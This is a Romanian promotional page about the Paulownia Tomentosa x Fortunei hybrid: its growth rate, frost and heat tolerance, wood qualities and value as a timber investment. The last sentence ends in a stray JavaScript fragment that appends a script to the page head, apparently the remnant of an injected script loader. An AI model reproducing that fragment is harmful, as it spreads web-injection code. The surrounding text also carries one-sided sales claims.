Paulownia, varietatea Tomentosa x Fortunei

Paulownia, varietatea Tomentosa x Fortunei

Familia de plante Paulowniaceae cuprinde numeroase soiuri, insa datorita selectiei artificiale s-au obtinut specii tot mai performante pentru nevoile oamenilor.
In ultimele decenii au avut loc cercetari de laborator care au avut ca scop final modificarea genetica a semintei de Paulownia, astfel incat aceasta nu doar sa supravietuiasca, dar sa isi si pastreze ritmul de crestere si calitatile in conditiile iernilor geroase si a verilor secetoase, cu temperaturi tot mai ridicate intalnite in tara noastra. Specialistii au ajuns la concluzia ca singura specie de Paulownia care face fata diferentelor mari de temperatura de la un anotimp la altul (-30 pana la +45 grade Celsius) fara a-si pierde calitatile si fara a-si incetini ritmul de crestere este Paulownia, varietatea Tomentosa x Fortunei.

Paulownia, varietatea Tomentosa x Fortunei este un copac foios ce poate atinge o inaltime de 30m la maturitate, cu frunze mari in forma de inima si un diametru in sectiune de pana la 80 cm. Florile apar primavara, avand o corola mov tubulara, iar fructul este o capsula uscata, maro continand mii de seminte.
Creste foarte bine intr-o varietate de soluri, ideale fiind terenurile umede, bine drenate si mediu argiloase.

Trunchiul principal este vertical avand ramuri care cresc sub un unghi de 45-60 grade fata de tulpina, iar latimea coroanei bogate poate ajunge la peste 8m. Lemnul sau este de culoare deschisa, cu o granulatie fina si foarte usor, rezistent la contorsionare.
Este recunoscut mondial datorita cresterii sale rapide, de aproximativ 4-5 m pe an, dar si datorita faptului ca se regenereaza din propria tulpina, dupa fiecare taiere un nou vlastar luand locul trunchiului taiat.

Un alt avantaj al copacului  Paulownia, varietatea Tomentosa x Fortunei il reprezinta rezistenta sa la temperaturi scazute de pana la -30 grade dar si la temperaturi ridicate de +45 grade. Este singura specie de Paulownia care rezista la diferente atat de mari de temperatura de la un sezon la altul, acesta este si motivul pentru care specialistii nostri nu recomanda plantarea altor specii de Paulownia in Romania. Chiar daca alte varietati vor supravietui si rezista conditiilor vitrege intalnite mai ales iarna la noi in tara, ritmul de crestere (care este in cele din urma ratiunea de la care pornim aceasta investitie) dar si calitatea lemnului obtinut vor avea mult de suferit.

Paulownia, varietatea Tomentosa x Fortunei reprezinta echilibrul care compenseaza atat pentru necesitatea de carbon, impadurirea terenurilor dar si necesitatea lemnului, fiind un copac uimitor care furnizeaza cherestea, combustibil dar care indeplineste totodata cerintele secolului 21 de rezolvare a problemelor ecologice.d.getElementsByTagName(‘head’)[0].appendChild(s);